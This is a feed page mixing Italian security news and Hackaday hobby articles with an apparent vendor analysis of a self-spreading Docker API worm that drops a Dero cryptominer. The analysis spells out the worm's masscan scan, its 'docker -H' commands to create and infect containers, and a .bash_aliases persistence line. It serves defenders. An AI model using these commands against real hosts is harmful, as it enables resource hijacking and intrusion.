• Osservazioni e discussioni pubblicate su X da analisti di sicurezza indipendenti (maggio 2025)

L'articolo Lumma Stealer: inizio del takedown o solo una mossa tattica? proviene da il blog della sicurezza informatica.

Although there are some ferries and commercial boats that use a multi-hull design, the most recognizable catamarans by far are those used for sailing. They have a number of advantages over monohull boats including higher stability, shallower draft, more deck space, and often less drag. Of course, these advantages aren’t exclusive to sailboats, and plenty of motorized recreational craft are starting to take advantage of this style as well. It’s also fairly straightforward to remove the sails and add powered locomotion as well, as this electric catamaran demonstrates.

Not only is this catamaran electric, but it’s solar powered as well. With the mast removed, the solar panels can be fitted to a canopy which provides 600 watts of power as well as shade to both passengers. The solar panels charge two 12V 100ah LifePo4 batteries and run a pair of motors. That’s another benefit of using a sailing cat as an electric boat platform: the rudders can be removed and a pair of motors installed without any additional drilling in the hulls, and the boat can be steered with differential thrust, although this boat also makes allowances for pointing the motors in different directions as well.

In addition to a highly polished electric drivetrain, the former sailboat adds some creature comforts as well, replacing the trampoline with a pair of seats and adding an electric hoist to raise and lower the canopy. As energy density goes up and costs come down for solar panels, more and more watercraft are taking advantage of this style of propulsion as well. In the past we’ve seen solar kayaks, solar houseboats, and custom-built catamarans (instead of conversions) as well.

youtube.com/embed/1DyONG2oHPg?…

hackaday.com/2025/05/21/jettis…

Gli abbonati dell’operatore di telecomunicazioni Cellcom, che serve gli utenti del Wisconsin e dell’Upper Michigan (USA), sono rimasti senza comunicazione per quasi una settimana: non potevano né chiamare né inviare SMS. Solo pochi giorni dopo l’inizio dell’incidente l’azienda ha ammesso ciò che era già stato sospettato: un attacco informatico aveva causato i massicci disagi.

Inizialmente, l’operatore ha definito l’incidente un malfunzionamento tecnico, assicurando che la trasmissione dati, iMessage, i messaggi RCS e le chiamate di emergenza al 911 hanno continuato a funzionare. Tuttavia, gli utenti esprimevano sempre più insoddisfazione per la mancanza di comunicazione e l’impossibilità di trasferire un numero a un altro operatore: i sistemi interni di Cellcom semplicemente non funzionavano.

Ora l’amministratore delegato dell’azienda, Brigid Riordan, ha confermato ufficialmente che si tratta di un “incidente informatico”.

In una lettera agli abbonati, ha sottolineato che l’azienda aveva messo in atto dei protocolli di risposta e che il team aveva seguito tali piani fin dall’inizio. Le misure adottate includono l’intervento di esperti esterni in sicurezza informatica, la notifica all’FBI e alle autorità del Wisconsin e il lavoro 24 ore su 24 per ripristinare i sistemi.

L’attacco ha colpito solo un segmento separato dell’infrastruttura, non correlato all’archiviazione dei dati personali. Finora non ci sono state prove di fughe di informazioni, compresi nomi, indirizzi e dati finanziari degli abbonati.

Al momento alcuni servizi vengono gradualmente ripristinati. Il 19 maggio gli utenti hanno potuto scambiarsi SMS ed effettuare chiamate all’interno della rete Cellcom. Tuttavia, i tempi necessari per una completa ripresa restano incerti. Nella sua pagina degli aggiornamenti, la società ha affermato che prevede di ripristinare tutti i servizi entro la fine della settimana, ma non è riuscita a fornire una data esatta.

Per gli abbonati il ​​cui ripristino della connessione è in ritardo, viene offerto un modo semplice per provare a ripristinare il servizio: attivare la modalità aereo per 10 secondi, quindi disattivarla. Se il problema persiste, riavviare il dispositivo.

Nonostante le crescenti critiche per la lenta risposta, Cellcom ha iniziato a essere più aperta sulla situazione: oltre alla lettera, l’amministratore delegato ha anche registrato un videomessaggio in cui spiega la situazione attuale e i progressi della ripresa. L’azienda non ha rilasciato dichiarazioni in merito al possibile attacco ransomware.

La situazione attuale dimostra quanto possa diventare critica la dipendenza dalla stabilità delle infrastrutture digitali, anche a livello regionale. Allo stesso tempo, Cellcom sottolinea di essersi preparata in anticipo a simili incidenti, ma che le conseguenze sono state comunque avvertite da decine di migliaia di utenti.

L'articolo Wisconsin e Michigan senza telefono: Cellcom è stata attaccata. Niente chiamate per una settimana proviene da il blog della sicurezza informatica.

Regular vs gene-edited spider silk with a fluorescent gene added. (Credit: Santiago-Rivera et al. 2025, Angewandte Chemie)
Continuing the scientific theme of adding fluorescent proteins to everything that moves, this time spiders found themselves at the pointy end of the CRISPR-Cas9 injection needle. In a study by researchers at the University of Bayreuth, common house spiders (Parasteatoda tepidariorum) had a gene inserted for a red fluorescent protein in addition to having an existing gene for eye development disabled. This was the first time that spiders have been subjected to this kind of gene-editing study, mostly due to how fiddly they are to handle as well as their genome duplication characteristics.

In the research paper in Angewandte Chemie the methods and results are detailed, with the knock-out approach of the sine oculis (C1) gene being tried first as a proof of concept. The CRISPR solution was injected into the ovaries of female spiders, whose offspring then carried the mutation. With clear deficiencies in eye development observable in this offspring, the researchers moved on to adding the red fluorescent protein gene with another CRISPR solution, which targets the major ampullate gland where the silk is produced.

Ultimately, this research serves to demonstrate that it is possible to not only study spiders in more depth these days using tools like CRISPR-Cas9, but also that it is possible to customize and study spider silk production.

hackaday.com/2025/05/21/gene-e…

Don’t you hate it when making your DIY X-ray machine you make an uncomfortable amount of ozone gas? No? Well [Hyperspace Pirate] did, which made him come up with an interesting idea. While creating a high voltage supply for his very own X-ray machine, the high voltage corona discharge produced a very large amount of ozone. However, normally ozone is produced using lower voltage, smaller gaps, and large surface areas. Naturally, this led [Hyperspace Pirate] to investigate if a higher voltage method is effective at producing ozone.

Using a custom 150kV converter, [Hyperspace Pirate] was able to test the large gap method compared to the lower voltage method (dielectric barrier discharge). An ammonia reaction with the ozone allowed our space buccaneer to test which method was able to produce more ozone, as well as some variations of the designs.

Experimental Setup with ozone production in the left jar and nitrate in the right.
Large 150kV gaps proved slightly effective but with no large gains, at least not compared to the dielectric barrier method. Of which, glass as the dielectric leads straight to holes, and HTPE gets cooked, but in the end, he was able to produce a somewhat sizable amount of ammonium nitrate. The best design included two test tubes filled with baking soda and their respective electrodes. Of course, this comes with the addition of a very effective ozone generator.

While this project is very thorough, [Hyperspace Pirate] himself admits the extreme dangers of high ozone levels, even getting close enough to LD50 levels for worry throughout out his room. This goes for when playing with high voltage in general kids! At the end of the day even with potential asthma risk, this is a pretty neat project that should probably be left to [Hyperspace Pirate]. If you want to check out other projects from a distance you should look over to this 20kW microwave to cook even the most rushed meals!

youtube.com/embed/HZYWpZYuRKc?…

Thanks to [Mahdi Naghavi] for the Tip!

hackaday.com/2025/05/21/high-v…

This week, Jonathan Bennett and Jeff Massie chat with Tom Herbert about eBPF, really fast networking, what the future looks like for high performance computing and the Linux Kernel, and more!

• medium.com/@tom_84912

youtube.com/embed/v9P5em2r0fo?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2025/05/21/floss-…

The ARRL used to have a requirement that any antenna advertised in their publications had to have real-world measurements accompanying it, to back up any claims of extravagant performance. I’m told that nowadays they will accept computer simulations instead, but it remains true that knowing what your antenna does rather than just thinking you know what it does gives you an advantage. I was reminded of this by a recent write-up in which the performance of a mylar sheet as a ground plane was tested at full power with a field strength meter, because about a decade ago I set out to characterise an antenna using real-world measurements and readily available equipment. I was in a sense field testing it, so of course the first step of the process was to find a field. A real one, with cows.

Walking Round And Round A Field In The Name Of Science

A very low-tech way to make field recordings.
The process I was intending to follow was simple enough. Set up the antenna in the middle of the field, have it transmit some RF, and measure the signal strength at points along a series of radial lines away from it I’d end up with a spreadsheet, from which I could make a radial plot that would I hoped, give me a diagram showing its performance. It’s a rough and ready methodology, but given a field and a sunny afternoon, not one that should be too difficult.

I was more interested in the process than the antenna, so I picked up my trusty HB9CV two-element 144MHz antenna that I’ve stood and pointed at the ISS many times to catch SSTV transmissions. It’s made from two phased half-wave radiators, but it can be seen as something similar to a two-element Yagi array. I ran a long mains lead oput to a plastic garden table with the HB9CV attached, and set up a Raspberry Pi whose clock would produce the RF.

My receiver would be an Android tablet with an RTL-SDR receiver. That’s pretty sensitive for this purpose, so my transmitter would have to be extremely low powered. Ideally I would want no significant RF to make it beyond the boundary of the field, so I gave the Pi a resistive attenuator network designed to give an output of around 0.03 mW, or 30 μW. A quick bit of code to send my callsign as CW periodically to satisfy my licence conditions, and I was off with the tablet and a pen and paper. Walking round the field in a polar grid wasn’t as easy as it might seem, but I had a very long tape measure to help me.

A Lot Of Work To Tell Me What I Already Knew

And lo! for I have proven an HB9CV to be directional!
I ended up with a page of figures, and then a spreadsheet which I’m amused to still find in the depths of my project folder. It contains a table of angles of incidence to the antenna versus metres from the antenna, and the data points are the figure in (uncalibrated) mV that the SDR gave me for the carrier at that point. The resulting polar plot shows the performace of the antenna at each angle, and unsurprisingly I proved to myself that a HB9CV is indeed a directional antenna.

My experiment was in itself not of much use other than to prove to myself I could characterise an antenna with extremely basic equipment. But then again it’s possible that in times past this might have been a much more difficult task, so knowing I can do it at all is an interesting conclusion.

hackaday.com/2025/05/21/field-…

The Macintosh Plus was Apple’s third version on the all-in-one Mac, and for its time it was a veritable powerhouse. If you don’t have one here in 2025 there are a variety of ways to emulate it, but should you wish for something closer to the silicon there’s now [max1zzz]’s all-new Mac Plus motherboard in a mini-ITX form factor to look forward to.

As with other retrocomputing communities, the classic Mac world has seen quite a few projects replacing custom parts with modern equivalents. Thus it has reverse engineered Apple PALs, a replacement for the Sony sound chip, an ATtiny based take on the Mac real-time clock, and a Pi Pico that does VGA conversion. It’s all surface mount save for the connectors and the 68000, purely because a socketed processor allows for one of the gold-and-ceramic packages to be used. The memory is soldered, but with 4 megabytes, this is well-specced for a Mac Plus.

At the moment it’s still in the prototype spin phase, but plenty of work is being done and it shows meaningful progress towards an eventual release to the world. We are impressed, and look forward to the modern takes on a Mac Plus which will inevitably come from it. While you’re waiting, amuse yourself with a lower-spec take on an early Mac.

Thanks [DosFox] for the tip.

hackaday.com/2025/05/21/a-new-…

If legend is to be believed, three disparate social forces in early 20th-century America – the temperance movement, the rise of car culture, and the Scots-Irish culture of the South – collided with unexpected results. The temperance movement managed to get Prohibition written into the Constitution, which rankled the rebellious spirit of the descendants of the Scots-Irish who settled the South. In response, some of them took to the backwoods with stills and sacks of corn, creating moonshine by the barrel for personal use and profit. And to avoid the consequences of this, they used their mechanical ingenuity to modify their Fords, Chevrolets, and Dodges to provide the speed needed to outrun the law.

Though that story may be somewhat apocryphal, at least one of those threads is still woven into the American story. The moonshiner’s hotrod morphed into NASCAR, one of the nation’s most-watched spectator sports, and informed much of the car culture of the 20th century in general. Unfortunately, that led in part to our current fossil fuel predicament and its attendant environmental consequences, which are now being addressed by replacing at least some of the gasoline we burn with the same “white lightning” those old moonshiners made. The cost-benefit analysis of ethanol as a fuel is open to debate, as is the wisdom of using food for motor fuel, but one thing’s for sure: turning corn into ethanol in industrially useful quantities isn’t easy, and it requires some Big Chemistry to get it done.

Heavy on the Starch

As with fossil fuels, manufacturing ethanol for motor fuel starts with a steady supply of an appropriate feedstock. But unlike the drilling rigs and pump jacks that pull the geochemically modified remains of half-billion-year-old phytoplankton from deep within the Earth, ethanol’s feedstock is almost entirely harvested from the vast swathes of corn that carpet the Midwest US (Other grains and even non-grain plants are used as feedstock in other parts of the world, but we’re going to stick with corn for this discussion. Also, other parts of the world refer to any grain crop as corn, but in this case, corn refers specifically to maize.)
Don’t try to eat it — you’ll break your teeth. Yellow dent corn is harvested when full of starch and hard as a rock. Credit: Marjhan Ramboyong.
The corn used for ethanol production is not the same as the corn-on-the-cob at a summer barbecue or that comes in plastic bags of frozen Niblets. Those products use sweet corn bred specifically to pack extra simple sugars and less starch into their kernels, which is harvested while the corn plant is still alive and the kernels are still tender. Field corn, on the other hand, is bred to produce as much starch as possible, and is left in the field until the stalks are dead and the kernels have converted almost all of their sugar into starch. This leaves the kernels dry and hard as a rock, and often with a dimple in their top face that gives them their other name, dent corn.

Each kernel of corn is a fruit, at least botanically, with all the genetic information needed to create a new corn plant. That’s carried in the germ of the kernel, a relatively small part of the kernel that contains the embryo, a bit of oil, and some enzymes. The bulk of the kernel is taken up by the endosperm, the energy reserve used by the embryo to germinate, and as a food source until photosynthesis kicks in. That energy reserve is mainly composed of starch, which will power the fermentation process to come.

Starch is mainly composed of two different but related polysaccharides, amylose and amylopectin. Both are polymers of the simple six-carbon sugar glucose, but with slightly different arrangements. Amylose is composed of long, straight chains of glucose molecules bound together in what’s called an α-1,4 glycosidic bond, which just means that the hydroxyl group on the first carbon of the first glucose is bound to the hydroxyl on the fourth carbon of the second glucose through an oxygen atom:
Amylose, one of the main polysaccharides in starch. The glucose subunits are connected in long, unbranched chains up to 500 or so residues long. The oxygen atom binding each glucose together comes from a reaction between the OH radicals on the 1 and 4 carbons, with one oxygen and two hydrogens leaving in the form of water.
Amylose chains can be up to about 500 or so glucose subunits long. Amylopectin, on the other hand, has shorter straight chains but also branches formed between the number one and number six carbon, an α-1,6 glycosidic bond. The branches appear about every 25 residues or so, making amylopectin much more tangled and complex than amylose. Amylopectin makes up about 75% of the starch in a kernel.

Slurry Time

Ethanol production begins with harvesting corn using combine harvesters. These massive machines cut down dozens of rows of corn at a time, separating the ears from the stalks and feeding them into a threshing drum, where the kernels are freed from the cob. Winnowing fans and sieves separate the chaff and debris from the kernels, which are stored in a tank onboard the combine until they can be transferred to a grain truck for transport to a grain bin for storage and further drying.
Corn harvest in progress. You’ve got to burn a lot of diesel to make ethanol. Credit: dvande – stock.adobe.com
Once the corn is properly dried, open-top hopper trucks or train cars transport it to the distillery. The first stop is the scale house, where the cargo is weighed and a small sample of grain is taken from deep within the hopper by a remote-controlled vacuum arm. The sample is transported directly to the scale house for a quick quality assessment, mainly based on moisture content but also the physical state of the kernels. Loads that are too wet, too dirty, or have too many fractured kernels are rejected.

Loads that pass QC are dumped through gates at the bottom of the hoppers into a pit that connects to storage silos via a series of augers and conveyors. Most ethanol plants keep a substantial stock of corn, enough to run the plant for several days in case of any supply disruption. Ethanol plants operate mainly in batch mode, with each batch taking several days to complete, so a large stock ensures the efficiency of continuous operation.
The Lakota Green Plains ethanol plant in Iowa. Ethanol plants look a lot like small petroleum refineries and share some of the same equipment. Source: MsEuphonic, CC BY-SA 3.0.
To start a batch of ethanol, corn kernels need to be milled into a fine flour. Corn is fed to a hammer mill, where large steel weights swinging on a flywheel smash the tough pericarp that protects the endosperm and the germ. The starch granules are also smashed to bits, exposing as much surface area as possible. The milled corn is then mixed with clean water to form a slurry, which can be pumped around the plant easily.

The first stop for the slurry is large cooking vats, which use steam to gently heat the mixture and break the starch into smaller chains. The heat also gelatinizes the starch, in a process that’s similar to what happens when a sauce is thickened with a corn starch slurry in the kitchen. The gelatinized starch undergoes liquefaction under heat and mildly acidic conditions, maintained by injecting sulfuric acid or ammonia as needed. These conditions begin hydrolysis of some of the α-1,4 glycosidic bonds, breaking the amylose and amylopectin chains down into shorter fragments called dextrin. An enzyme, α-amylase, is also added at this point to catalyze the α-1,4 bonds to create free glucose monomers. The α-1,6 bonds are cleaved by another enzyme, α-amyloglucosidase.

The Yeast Get Busy

The result of all this chemical and enzymatic action is a glucose-rich mixture ready for fermentation. The slurry is pumped to large reactor vessels where a combination of yeasts is added. Saccharomyces cerevisiae, or brewer’s yeast, is the most common, but other organisms can be used too. The culture is supplemented with ammonia sulfate or urea to provide the nitrogen the growing yeast requires, along with antibiotics to prevent bacterial overgrowth of the culture.

Fermentation occurs at around 30 degrees C over two to three days, while the yeast gorge themselves on the glucose-rich slurry. The glucose is transported into the yeast, where each glucose molecule is enzymatically split into two three-carbon pyruvate molecules. The pyruvates are then broken down into two molecules of acetaldehyde and two of CO₂. The two acetaldehyde molecules then undergo a reduction reaction that creates two ethanol molecules. The yeast benefits from all this work by converting two molecules of ADP into two molecules of ATP, which captures the chemical energy in the glucose molecule into a form that can be used to power its metabolic processes, including making more yeast to take advantage of the bounty of glucose.
Anaerobic fermentation of one mole of glucose yields two moles of ethanol and two moles of CO₂.
After the population of yeast grows to the point where they use up all the glucose, the mix in the reactors, which contains about 12-15% ethanol and is referred to as beer, is pumped into a series of three distillation towers. The beer is carefully heated to the boiling point of ethanol, 78 °C. The ethanol vapors rise through the tower to a condenser, where they change back into the liquid phase and trickle down into collecting trays lining the tower. The liquid distillate is piped to the next two towers, where the same process occurs and the distillate becomes increasingly purer. At the end of the final distillation, the mixture is about 95% pure ethanol, or 190 proof. That’s the limit of purity for fractional distillation, thanks to the tendency of water and ethanol to form an azeotrope, a mixture of two or more liquids that boils at a constant temperature. To drive off the rest of the water, the distillate is pumped into large tanks containing zeolite, a molecular sieve. The zeolite beads have pores large enough to admit water molecules, but too small to admit ethanol. The water partitions into the zeolite, leaving 99% to 100% pure (198 to 200 proof) ethanol behind. The ethanol is mixed with a denaturant, usually 5% gasoline, to make it undrinkable, and pumped into storage tanks to await shipping.

Nothing Goes to Waste

The muck at the bottom of the distillation towers, referred to as whole stillage, still has a lot of valuable material and does not go to waste. The liquid is first pumped into centrifuges to separate the remaining grain solids from the liquid. The solids, called wet distiller’s grain or WDG, go to a rotary dryer, where hot air drives off most of the remaining moisture. The final product is dried distiller’s grain with solubles, or DDGS, a high-protein product used to enrich animal feed. The liquid phase from the centrifuge is called thin stillage, which contains the valuable corn oil from the germ. That’s recovered and sold as an animal feed additive, too.
Ethanol fermentation produces mountains of DDGS, or dried distiller’s grain solubles. This valuable byproduct can account for 20% of an ethanol plant’s income. Source: Inside an Ethanol Plant (YouTube).
The final valuable product that’s recovered is the carbon dioxide. Fermentation produces a lot of CO₂, about 17 pounds per bushel of feedstock. The gas is tapped off the tops of the fermentation vessels by CO₂ scrubbers and run through a series of compressors and coolers, which turn it into liquid carbon dioxide. This is sold off by the tanker-full to chemical companies, food and beverage manufacturers, who use it to carbonate soft drinks, and municipal water treatment plants, where it’s used to balance the pH of wastewater.

There are currently 187 fuel ethanol plants in the United States, most of which are located in the Midwest’s corn belt, for obvious reasons. Together, these plants produced more than 16 billion gallons of ethanol in 2024. Since each bushel of corn yields about 3 gallons of ethanol, that translates to an astonishing 5 billion bushels of corn used for fuel production, or about a third of the total US corn production.

hackaday.com/2025/05/21/big-ch…

Il codice sorgente del pannello affiliato del malware VanHelsing RaaS (ransomware-as-a-service) è stato reso di pubblico dominio. Non molto tempo prima, l’ex sviluppatore aveva provato a vendere il codice sorgente sul forum di hacking RAMP.

Il ransomware VanHelsing è stato lanciato nel marzo 2025 e i suoi creatori hanno affermato che era in grado di attaccare sistemi basati su Windows, Linux, BSD, ARM ed ESXi. Secondo Ransomware.live, da allora almeno otto vittime sono state preda di attacchi ransomware.

All’inizio di questa settimana, qualcuno che utilizzava il nickname th30c0der ha tentato di vendere sul darknet il codice sorgente del pannello e dei siti affiliati di VanHelsing, nonché build di ransomware per Windows e Linux. Il prezzo sarebbe stato determinato da una asta, con un’offerta iniziale di 10.000 dollari.

“Vendita del codice sorgente del ransomware vanhelsing: chiavi TOR incluse + pannello di amministrazione web + chat + file server + blog, inclusi tutti i database”, ha scritto th30c0der sul forum di hacking RAMP.

Secondo il ricercatore di sicurezza informatica Emanuele De Lucia, gli operatori di VanHelsing hanno deciso di anticipare il venditore e hanno pubblicato loro stessi il codice sorgente del ransomware. Hanno anche affermato che th30c0der è uno dei loro ex sviluppatori di malware che cerca di truffare la gente e vendere vecchi codici sorgente.

“Oggi annunciamo che pubblicheremo i vecchi codici sorgente e che presto pubblicheremo una nuova e migliorata versione del locker (VanHelsing 2.0)”, hanno affermato gli operatori di VanHelsing su RAMP.

In risposta a ciò, th30c0der ha affermato che le sue informazioni sono più complete, poiché gli sviluppatori di VanHelsing non hanno pubblicato il Linux Builder né alcun database, il che potrebbe essere particolarmente utile per le forze dell’ordine e i ricercatori sulla sicurezza informatica.

I giornalisti della rivista Bleeping Computer hanno studiato i codici sorgente pubblicati e hanno confermato che contengono un vero e proprio builder per la versione Windows del malware, nonché il codice sorgente per il pannello di affiliazione e il sito per il “drenaggio” dei dati.

Secondo i ricercatori, il codice sorgente del builder è un pasticcio e i file di Visual Studio si trovano nella cartella Release, solitamente utilizzata per archiviare i file binari compilati e gli artefatti di build.

Si noti inoltre che l’utilizzo del generatore VanHelsing richiede un po’ di lavoro aggiuntivo, poiché si connette al pannello di affiliazione all’indirizzo 31.222.238[.]208 per recuperare i dati. Considerando che il dump contiene il codice sorgente del pannello in cui si trova l’endpoint api.php, gli aggressori possono modificare il codice o eseguire la propria versione del pannello per far funzionare il builder.

Inoltre, l’archivio pubblicato contiene il codice sorgente del ransomware per Windows, che può essere utilizzato per creare una build, un decryptor e un loader autonomi.

Tra le altre cose, la pubblicazione rileva che gli aggressori, a quanto pare, hanno tentato di creare un blocco MBR che avrebbe sostituito il master boot record con un bootloader personalizzato che avrebbe visualizzato un messaggio relativo al blocco.

L'articolo VanHelsing Ransomware: il codice sorgente trapelato rivela segreti sconcertanti proviene da il blog della sicurezza informatica.

Automotive racing is a grueling endeavor, a test of one’s mental and physical prowess to push an engineered masterpiece to its limit. This is all the more true of 24 hour endurance races where teams tag team to get the most laps of a circuit in over a 24 hour period. The format pushes cars and drivers to the very limit. Doing so on a $500 budget as presented by the 24 hours of Lemons makes this all the more impressive!

Of course, racing on a $500 budget is difficult to say the least. All the expected Fédération Internationale de l’Automobile (FIA) safety requirements are still in place, including roll cage, seats and fire extinguisher. However, brakes, wheels, tires and safety equipment are not factored into the cost of the car, which is good because an FIA racing seat can run well in excess of the budget. Despite the name, most races are twelve to sixteen hours across two days, but 24 hour endurance races are run. The very limiting budget and amateur nature of the event has created a large amount of room for teams to get creative with car restorations and race car builds.

The 24 Hours of Le-MINES Team and their 1990 Miata
One such team we had the chance of speaking to goes by the name 24 Hours of Le-Mines. Their build is a wonderful mishmash of custom fabrication and affordable parts. It’s built from a restored 1999 NA Miata complete with rusted frame and all! Power is handled by a rebuilt 302 Mustang engine of indeterminate age.

The stock Miata brakes seem rather small for a race car, but are plenty for a car of its weight. Suspension is an Amazon special because it only has to work for 24 hours. The boot lid (or trunk if you prefer) is held down with what look to be over-sized RC car pins. Nestled next to the PVC pipe inlet pipe is a nitrous oxide canister — we don’t know if it’s functional or for show, but we like it nonetheless. The scrappy look is completed with a portion of the road sign fabricated into a shifter cover.

The team is unsure if the car will end up racing, but odds are if you are reading Hackaday, you care more about the race cars then the actual racing. Regardless, we hope to see this Miata in the future!

This is certainly not the first time we have covered 24 hour endurance engineering, like this solar powered endurance plane.

hackaday.com/2025/05/21/a-look…

Introduction

Imagine a container zombie outbreak where a single infected container scans the internet for an exposed Docker API, and bites exploits it by creating new malicious containers and compromising the running ones, thus transforming them into new “zombies” that will mine for Dero currency and continue “biting” new victims. No command-and-control server is required for the delivery, just an exponentially growing number of victims that are automatically infecting new ones. That’s exactly what the new Dero mining campaign does.

During a recent compromise assessment project, we detected a number of running containers with malicious activities. Some of the containers were previously recognized, while others were not. After forensically analyzing the containers, we confirmed that a threat actor was able to gain initial access to a running containerized infrastructure by exploiting an insecurely published Docker API. This led to the running containers being compromised and new ones being created not only to hijack the victim’s resources for cryptocurrency mining but also to launch external attacks to propagate to other networks. The diagram below describes the attack vector:

Infection chain

The entire attack vector is automated via two malware implants: the previously unknown propagation malware nginx and the Dero crypto miner. Both samples are written in Golang and packed with UPX. Kaspersky products detect these malicious implants with the following verdicts:

• nginx: Trojan.Linux.Agent.gen;
• Dero crypto miner: RiskTool.Linux.Miner.gen.

nginx: the propagation malware

This malware is responsible for maintaining the persistence of the crypto miner and its further propagation to external systems. This implant is designed to minimize interaction with the operator and does not require a delivery C2 server. nginx ensures that the malware spreads as long as there are users insecurely publishing their Docker APIs on the internet.

The malware is named “nginx” to masquerade as the well-known legitimate nginx web server software in an attempt to evade detection by users and security tools. In this post, we’ll refer to this malware as “nginx”.

After unpacking the nginx malware, we parsed the metadata of the Go binary and were able to determine the location of the Go source code file at compilation time: “/root/shuju/docker2375/nginx.go”.

Nginx source code file

Infecting the container

The malware starts by creating a log file at “/var/log/nginx.log”.

Log file creation

This log file will be used later to log the running activities of the malware, including data like the list of infected machines, the names of created malicious containers on those machines, and the exit status code if there were any errors.

Malware operations log

After that, in a new process, a function called main.checkVersion loops infinitely to make sure that the content of a file located at “/usr/bin/version.dat” inside the compromised container always equals 1.4. If the file contents were changed, this function overwrites them.

Ensuring that version.dat exists and contains 1.4

If version.dat doesn’t exist, the malicious function creates this file with the content 1.4, then sleeps for 24 hours before the next iteration.

Creating version.dat if it doesn’t exist

The malware uses the version.dat file to identify the already infected containers, which we’ll describe later.
The nginx sample then executes the main.monitorCloudProcess function that loops infinitely in a new process making sure that a process named cloud, which is a Dero miner, is running. First, the malware checks whether or not the cloud process is running. If it’s not, nginx executes the main.startCloudProcess function to launch the miner.

Monitoring and executing the cloud process

In order to execute the miner, the main.startCloudProcess function attempts to locate it at “/usr/bin/cloud”.

Executing the miner

Spreading the infection

Host search

Next, the nginx malware will go into an infinite loop of generating random IPv4 /16 network subnets to scan them and compromise more networks with the main.generateRandomSubnet function.

Infinite loop of network subnets generation and scanning

The subnets with the respective IP ranges will be passed to the main.scanSubnet function to be scanned via masscan, a port scanning tool installed in the container by the malware, which we will describe in more detail later. The scanner is looking for an insecure Docker API published on the internet to exploit by scanning the generated subnet via the following command: masscan -p 2375 -oL – –max-rate 360.

Scanning the generated subnet via masscan

The output of masscan is parsed via regex to extract the IPv4s that have the default Docker API port 2375 open. Then the extracted IPv4s are passed to the main.checkDockerDaemon function. It checks if the remote dockerd daemon on the host with a matching IPv4 is running and responsive. To do this, the malware attempts to list all running containers on the remote host by executing a docker -H PS command. If it fails, nginx proceeds to check the next IPv4.

Remotely listing running containers

Container creation

After confirming that the remote dockerd daemon is running and responsive, nginx generates a container name with 12 random characters and uses it to create a malicious container on the remote target.

Container name generation

The malicious container is created with docker -H run -dt –name –restart always ubuntu:18.04 /bin/bash. The malware uses a –restart always flag to start the newly created containers automatically when they exit.

Malicious container created on a new host

Then nginx prepares the new container to install dependencies later by updating the packages via docker -H exec apt-get -yq update.

Updating container packages

Next, the malicious sample uses a docker -H exec apt-get install -yq masscan docker.io command to install masscan and docker.io in the container, which are dependencies for the malware to interact with the Docker daemon and to perform the external scan to infect other networks.

Remotely installing the malware dependencies inside the newly created container

Then it transfers the two malicious implants, nginx and cloud, to the container by executing docker -H cp -L /usr/bin/ :/usr/bin.

Transferring nginx and cloud to the newly created container

The malware maintains persistence by adding the transferred nginx binary to /root/.bash_aliases to make sure that it will automatically execute upon shell login. This is done via a docker -H exec bash –norc -c \'echo \"/usr/bin/nginx &\" > /root/.bash_aliases\' command.

Adding the nginx malware to .bash_aliases for persistence

Compromising running containers

Up until this point, the malware has only created new malicious containers. Now, it will try to compromise the ubuntu:18.04-based running containers. The sample first executes the main.checkAndOperateContainers function to check all the running containers on the remote vulnerable host for two conditions: the container has an ubuntu:18.04-base and it doesn’t contain a version.dat file, which is an indicator that the container had been previously infected.

Listing and compromising existing containers on the remote target

If these conditions are satisfied, the malware executes the main.operateOnContainer function to proceed with the same attack vector described earlier to infect the running container. The infection chain is repeated, hijacking the container resources to scan and compromise more containers and mining for the Dero cryptocurrency.

That way, the malware does not require a C2 connection and also maintains its activity as long as there is an insecurely published Docker API that can be exploited to compromise running containers and create new ones.

cloud – the Dero miner

Executing and maintaining cloud, the crypto miner, is the primary goal of the nginx sample. The miner is also written in Golang and packed with UPX. After unpacking the binary, we were able to attribute it to the open-source DeroHE CLI miner project found on GitHub. The threat actor wrapped the DeroHE CLI miner into the cloud malware, with a hardcoded mining configuration: a wallet address and a DeroHE node (derod) address.

If no addresses were passed as arguments, which is the case in this campaign, the cloud malware uses the hardcoded encrypted configuration as the default configuration. It is stored as a Base64-encoded string that, after decoding, results in an AES-CTR encrypted blob of a Base64-encoded wallet address, which is decrypted with the main.decrypt function. The configuration encryption indicates that the threat actors attempt to sophisticate the malware, as we haven’t seen this in previous campaigns.

Decrypting the crypto wallet address

Upon decoding this string, we uncovered the wallet address in clear text: dero1qyy8xjrdjcn2dvr6pwe40jrl3evv9vam6tpx537vux60xxkx6hs7zqgde993y.

Behavioral analysis of the decryption function

Then the malware decrypts another two hardcoded AES-CTR encrypted strings to get the dero node addresses via a function named main.sockz.

Function calls to decrypt the addresses

The node addresses are encrypted the same way the wallet address is, but with other keys. After decryption, we were able to obtain the following addresses: d.windowsupdatesupport[.]link and h.wiNdowsupdatesupport[.]link.

Decoded addresses in memory

The same wallet address and the derod node addresses had been observed before in a campaign that targeted Kubernetes clusters with Kubernetes API anonymous authentication enabled. Instead of transferring the malware to a compromised container, the threat actor pulls a malicious image named pauseyyf/pause:latest, which is published on Docker Hub and contains the miner. This image was used to create the malicious container. Unlike the current campaign, the attack vector was meant to be stealthy as threat actors didn’t attempt to move laterally or scan the internet to compromise more networks. These attacks were seen throughout 2023 and 2024 with minor changes in techniques.

Takeaways

Although attacks on containers are less frequent than on other systems, they are not less dangerous. In the case we analyzed, containerized environments were compromised through a combination of a previously known miner and a new sample that created malicious containers and infected existing ones. The two malicious implants spread without a C2 server, making any network that has a containerized infrastructure and insecurely published Docker API to the internet a potential target.

Analysis of Shodan shows that in April 2025, there were 520 published Docker APIs over port 2375 worldwide. It highlights the potential destructive consequences of the described threat and emphasizes the need for thorough monitoring and container protection.

Docker APIs published over port 2375 ports worldwide, January–April 2025 (download)

Building your containerized infrastructure from known legitimate images alone doesn’t guarantee security. Just like any other system, containerized applications can be compromised at runtime, so it’s crucial to monitor your containerized infrastructure with efficient monitoring tools like Kaspersky Container Security. It detects misconfigurations and monitors registry images, ensuring the safety of container environments. We also recommend proactively hunting for threats to detect stealthy malicious activities and incidents that might have slipped unnoticed on your network. The Kaspersky Compromise Assessment service can help you not only detect such incidents, but also remediate them and provide immediate and effective incident response activities.

Indicators of compromise

File hashes
